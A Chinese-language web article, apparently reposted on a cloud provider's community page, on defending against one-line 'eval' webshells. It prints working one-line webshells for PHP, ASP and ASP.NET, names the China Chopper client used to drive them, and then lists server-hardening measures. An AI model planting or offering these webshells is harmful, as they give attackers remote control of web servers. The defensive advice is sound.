防止 eval(),request()一句式木馬

來源:互聯網
上載者:User

服務端只需要簡單的一行代碼,即可用此程式實現常用的管理功能。
  
  在服務端啟動並執行代碼如下:
 

 代碼如下 複製代碼
 PHP:    <?php @eval($_POST['hk715']);?>
  ASP:    <%eval request("pass")%>
  ASP.NET:    <%@ Page Language="Jscript"%><%eval(Request.Item["hk715"],"unsafe");%>

   (注意: ASP.NET要單獨一個檔案或此檔案也是Jscript語言)

用戶端:有專門的程式,我經常使用的是中國菜刀。

既然是木馬,就是可以用來入侵你的伺服器,寫shell等,但是他隱蔽性強,防範比較困難。

下面提幾點防範措施:
1、伺服器要控制好使用者權限、對於一個伺服器有多個網站的,要控制好各網站許可權,各網站應相互獨立。IIS下用虛擬機器主機安全配置方法,linux下,apache容易控制,nginx的話,目前還沒有較好控制方法。這個的目的就是防止跨站。另外對與指定網站,一定需控制好寫入權限。
2、如果是IIS主機,可以安裝網站淨化器http://www.fengyn.cn/article.asp?id=223
3、對應於PHP下的一些應用,DZ,pw 或者一些cms.建議對與config.php一類的設定資料庫檔案,進行zend加密,以防止MYSQL的賬戶泄漏。另外,對於MYSQL,一定要做到,各資料庫使用者分立,許可權做到最小化。
4、php下限制一下危險函數,這個在本部落格裡也有說明。
5、WIN下用麥咖啡做一些安全上的設定。linux下做好系統的安全,登陸安全控制等。

以上只是一些防範措施,另外,需要管理員,定期檢查伺服器,看是否有異常檔案或異常情況

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.